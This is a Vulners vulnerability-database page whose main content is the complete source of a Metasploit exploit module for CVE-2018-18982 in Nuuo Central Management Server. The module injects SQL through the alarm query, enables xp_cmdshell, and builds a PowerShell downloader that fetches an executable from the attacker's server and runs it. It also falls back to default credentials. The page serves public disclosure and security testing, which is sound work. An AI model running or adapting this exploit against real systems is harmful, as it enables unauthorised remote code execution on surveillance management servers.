Vulners
Lucene search
Nuuo Central Management SQL Injection
| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
 | Nuuo Central Management SQL Injection Exploit | 21 Feb 201900:00 | – | zdt |
 | Nuuo Central Management Server Authenticated SQL Server SQLi | 27 Nov 201800:00 | – | attackerkb |
 | CVE-2018-18982 | 22 Feb 201900:00 | – | circl |
 | NUUO CMS SQL Injection Vulnerability | 28 Nov 201800:00 | – | cnvd |
 | CVE-2018-18982 | 27 Nov 201821:00 | – | cve |
 | CVE-2018-18982 | 27 Nov 201821:00 | – | cvelist |
 | Nuuo Central Management - (Authenticated) SQL Server SQL Injection (Metasploit) | 22 Feb 201900:00 | – | exploitdb |
 | NUUO CMS (Update A) | 11 Oct 201800:00 | – | ics |
 | Nuuo Central Management Authenticated SQL Server SQLi | 21 Jan 201910:14 | – | metasploit |
 | CVE-2018-18982 | 27 Nov 201820:29 | – | nvd |
10
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
include Msf::Exploit::Remote::Nuuo
include Msf::Exploit::Remote::HttpServer
def initialize(info={})
super(update_info(info,
'Name' => 'Nuuo Central Management Authenticated SQL Server SQLi',
'Description' => %q{
The Nuuo Central Management Server allows an authenticated user to query the state of the alarms.
This functionality can be abused to inject SQL into the query. As SQL Server 2005 Express is
installed by default, xp_cmdshell can be enabled and abused to achieve code execution.
This module will either use a provided session number (which can be guessed with an auxiliary
module) or attempt to login using a provided username and password - it will also try the
default credentials if nothing is provided.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Pedro Ribeiro <[email protected]>' # Vulnerability discovery and Metasploit module
],
'References' =>
[
[ 'CVE', '2018-18982' ],
[ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02' ],
[ 'URL', 'https://seclists.org/fulldisclosure/2019/Jan/51' ],
[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt' ]
],
'Platform' => 'win',
'Arch' => ARCH_X86,
'Stance' => Msf::Exploit::Stance::Aggressive, # we need this to run in the foreground
'Targets' =>
[
[ 'Nuuo Central Management Server <= v2.10.0', {} ],
],
'Notes' =>
{
'SideEffects' => [ ARTIFACTS_ON_DISK ]
},
'Privileged' => false, # we run as NETWORK_SERVICE
'DisclosureDate' => 'Oct 11 2018',
'DefaultTarget' => 0))
register_options [
Opt::RPORT(5180),
OptInt.new('HTTPDELAY', [false, 'Number of seconds the web server will wait before termination', 10]),
OptString.new('URIPATH', [true, 'The URI to use for this exploit', "/#{rand_text_alpha(8..10)}"])
]
end
def inject_sql(sql, final = false)
sql = ['GETOPENALARM',"DeviceID: #{rand_text_numeric(4)}","SourceServer: ';#{sql};-- ","LastOne: #{rand_text_numeric(4)}"]
if final
nucs_send_msg_async(sql)
else
nucs_send_msg(sql)
end
end
# Handle incoming requests from the server
def on_request_uri(cli, request)
unless @pl
print_error("A request came in, but the payload wasn't ready yet!")
return
end
print_good('Sending the payload to CMS...')
send_response(cli, @pl)
Rex.sleep(3)
print_status('Executing shell...')
inject_sql(create_hex_cmd("xp_cmdshell \"cmd /c C:\\windows\\temp\\#{@filename}\""), true)
register_file_for_cleanup("c:/windows/temp/#{@filename}")
end
def create_hex_cmd(cmd)
var = rand_text_alpha(2)
hex_cmd = "declare @#{var} varchar(8000); select @#{var}=0x"
cmd.each_byte { |b|
hex_cmd << b.to_i.to_s(16)
}
hex_cmd << "; exec (@#{var})"
end
def primer
# we need to roll our own here instead of using the MSSQL mixins
# (tried that and it doesn't work)
service_url = "http://#{srvhost_addr}:#{srvport}#{datastore['URIPATH']}"
print_status("Enabling xp_cmdshell and asking CMS to download and execute #{service_url}")
@filename = "#{rand_text_alpha_lower(8..10)}.exe"
ps1 = "#{rand_text_alpha_lower(8..10)}.ps1"
download_pl = %{xp_cmdshell }
download_pl << %{'cd C:\\windows\\temp\\ && }
download_pl << %{echo $webclient = New-Object System.Net.WebClient >> #{ps1} && }
download_pl << %{echo $url = "#{service_url}" >> #{ps1} && }
download_pl << %{echo $file = "#{@filename}" >> #{ps1} && }
download_pl << %{echo $webclient.DownloadFile($url,$file) >> #{ps1} && }
download_pl << %{powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File #{ps1}'}
print_status('Injecting PowerShell payload')
inject_sql("exec sp_configure 'show advanced options', 1; reconfigure; exec sp_configure 'xp_cmdshell', 1; reconfigure; " + create_hex_cmd(download_pl))
register_file_for_cleanup("c:/windows/temp/#{ps1}")
end
def exploit
nucs_login
unless @nucs_session
fail_with(Failure::Unknown, 'Failed to login to Nuuo CMS')
end
@pl = generate_payload_exe
#do not use SSL
if datastore['SSL']
ssl_restore = true
datastore['SSL'] = false
end
begin
Timeout.timeout(datastore['HTTPDELAY']) {super}
rescue Timeout::Error
datastore['SSL'] = true if ssl_restore
end
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
21 Feb 2019 00:00Current
0.5Low risk
Vulners AI Score0.5
EPSS0.66827